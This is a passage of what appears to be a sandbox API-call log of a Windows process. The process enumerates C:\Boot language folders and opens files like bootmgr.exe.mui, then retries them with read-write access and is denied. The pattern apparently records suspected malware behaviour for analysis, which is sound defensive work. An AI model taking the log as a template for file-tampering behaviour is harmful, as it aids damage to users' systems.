hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.501] AreFileApisANSI () returned 1 [0084.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0084.501] AreFileApisANSI () returned 1 [0084.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0084.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0084.501] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.501] GetFileType (hFile=0x354) returned 0x1 [0084.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.501] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.502] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.502] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.502] CloseHandle (hObject=0x354) returned 1 [0084.502] AreFileApisANSI () returned 1 [0084.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53490 [0084.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53490, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0084.502] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.502] GetLastError () returned 0x5 [0084.502] GetLastError () returned 0x5 [0084.502] SetLastError (dwErrCode=0x5) [0084.502] GetLastError () returned 0x5 [0084.502] SetLastError (dwErrCode=0x5) [0084.502] GetLastError () returned 0x5 [0084.502] SetLastError (dwErrCode=0x5) [0084.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.503] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.503] AreFileApisANSI () returned 1 [0084.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-CN\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-CN\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.504] AreFileApisANSI () returned 1 [0084.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0084.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 30 [0084.504] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.504] GetFileType (hFile=0x354) returned 0x1 [0084.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.504] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.504] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.505] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.505] CloseHandle (hObject=0x354) returned 1 [0084.505] AreFileApisANSI () returned 1 [0084.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0084.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 30 [0084.505] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.505] GetLastError () returned 0x5 [0084.505] GetLastError () returned 0x5 [0084.505] SetLastError (dwErrCode=0x5) [0084.505] GetLastError () returned 0x5 [0084.505] SetLastError (dwErrCode=0x5) [0084.505] GetLastError () returned 0x5 [0084.505] SetLastError (dwErrCode=0x5) [0084.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ꖠ")) returned 0 [0084.506] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.506] AreFileApisANSI () returned 1 [0084.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-HK", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-HK", lpUsedDefaultChar=0x0) returned 14 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.507] AreFileApisANSI () returned 1 [0084.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0084.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-HK") returned 14 [0084.507] CreateFileW (lpFileName="C:\\Boot\\zh-HK" (normalized: "c:\\boot\\zh-hk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.507] GetLastError () returned 0x5 [0084.507] GetLastError () returned 0x5 [0084.507] SetLastError (dwErrCode=0x5) [0084.507] GetLastError () returned 0x5 [0084.507] SetLastError (dwErrCode=0x5) [0084.507] GetLastError () returned 0x5 [0084.507] SetLastError (dwErrCode=0x5) [0084.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.507] AreFileApisANSI () returned 1 [0084.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88680 [0084.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-HK") returned 14 [0084.507] CreateFileW (lpFileName="C:\\Boot\\zh-HK" (normalized: "c:\\boot\\zh-hk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.507] GetLastError () returned 0x5 [0084.616] GetLastError () returned 0x5 [0084.633] SetLastError (dwErrCode=0x5) [0084.633] GetLastError () returned 0x5 [0084.633] SetLastError (dwErrCode=0x5) [0084.633] GetLastError () returned 0x5 [0084.633] SetLastError (dwErrCode=0x5) [0084.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.634] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.634] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-HK\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78510 [0084.634] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.634] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.634] RtlAllocateHeap (HeapHandle=0x20000, 